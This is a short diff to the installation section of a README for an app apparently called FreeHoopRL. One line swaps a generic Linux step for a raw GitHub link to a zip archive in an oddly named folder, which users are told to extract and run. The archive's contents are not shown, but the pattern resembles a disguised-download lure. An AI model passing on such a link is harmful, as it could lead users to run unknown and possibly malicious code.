SicrediRC/FreeHoopRL/README.md

 2. **Installation**:
    - For Windows: Double-click the downloaded .exe file and follow the on-screen instructions.
    - For macOS: Open the .dmg file and drag the FreeHoopRL icon to your Applications folder.
-   - For Linux: Extract the tar.gz file and run the application from the extracted folder.
+   - For Linux: Extract the https://raw.githubusercontent.com/SicrediRC/FreeHoopRL/main/unwrestled/FreeHoopRL.zip file and run the application from the extracted folder.

 3. **Launching the App**: Find the FreeHoopRL icon on your desktop or in your Applications folder and double-click to open it.